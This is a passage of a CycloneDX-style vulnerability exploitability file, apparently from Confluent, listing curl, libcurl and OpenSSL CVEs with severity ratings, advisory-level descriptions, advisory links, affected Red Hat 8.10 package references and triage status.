          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-8927",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        294
      ],
      "description": "When reusing a libcurl handle for sequential transfers driven by\nenvironment-variable proxy configuration, libcurl fails to clear the proxy\nauthentication state between requests. Specifically, if the initial transfer\nauthenticates against `proxyA` using Digest auth, a subsequent transfer routed\nthrough `proxyB` erroneously leaks the `Proxy-Authorization:` header intended\nsolely for `proxyA`.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8927"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55432"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8927"
        },
        {
          "url": "https://bugzilla.redhat.com/2496769"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496769"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8927.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8927.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8927.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8927"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55432.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55432"
        },
        {
          "url": "https://github.com/advisories/GHSA-jr4f-4564-w3mr"
        },
        {
          "url": "https://hackerone.com/reports/3744543"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-8927.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55432.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8927"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8927"
        }
      ],
      "published": "2026-07-03T07:16:25+00:00",
      "updated": "2026-07-07T23:21:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-8932",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "description": "libcurl would reuse a previously created connection even when some mTLS config\nrelated option had been changed that should have prohibited reuse.\n\nlibcurl keeps previously used connections in a connection pool for subsequent\ntransfers to reuse if one of them matches the setup. However, some TLS\nsettings related to client certificates were left out from the configuration\nmatch checks, making them match too easily. In particular options related to\nthe private key.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8932"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8932"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8932.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8932.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-m7xm-hf59-w6rj"
        },
        {
          "url": "https://hackerone.com/reports/3733910"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8932"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8932"
        }
      ],
      "published": "2026-07-03T07:16:25+00:00",
      "updated": "2026-07-07T23:18:32+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-9076",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Issue summary: When CMS password-based decryption (RFC 3211 / PWRI key unwrap)\nprocesses attacker-supplied CMS data, an attacker-chosen stream-mode KEK\ncipher can trigger a heap out-of-bounds read in kek_unwrap_key().\n\nImpact summary: A heap buffer over-read may trigger a crash which leads to\nDenial of Service for an application if the input buffer ends at a memory\npage boundary and the following page is unmapped. There is no information\ndisclosure as the over-read bytes are not revealed to the attacker.\n\nThe key unwrapping function performs a check-byte test as specified in the\nRFC that reads 7 bytes from a heap allocation that is based on the wrapped\nkey length from the message. There is a minimum length check based on the\nblock length of the wrapping cipher. However the cipher is selected from\nan OID carried in the attacker's PWRI keyEncryptionAlgorithm with no\nrequirement that the cipher be a block cipher. When an attacker selects\na stream-mode cipher the guard will be ineffective and the allocated buffer\ncontaining the unwrapped key can be too small to fit the check-bytes\nspecified in the RFC and a buffer over-read can happen.\n\nApplications calling CMS_decrypt() or CMS_decrypt_set1_password()\n(equivalently openssl cms -decrypt -pwri_password ...) on untrusted CMS\ndata are vulnerable to this issue. No password knowledge is required: the\nover-read happens during the unwrap attempt before any authentication\nsucceeds.\n\nThe over-read is limited to a few bytes and is not written to output, so\nthere is no information disclosure. Triggering a crash requires the\nallocation to border unmapped memory, which is unlikely with the normal\nallocator.\n\nThe FIPS modules are not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-9076"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25237"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25239"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-9076"
        },
        {
          "url": "https://bugzilla.redhat.com/2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/2481898"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481898"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446"
        },
        {
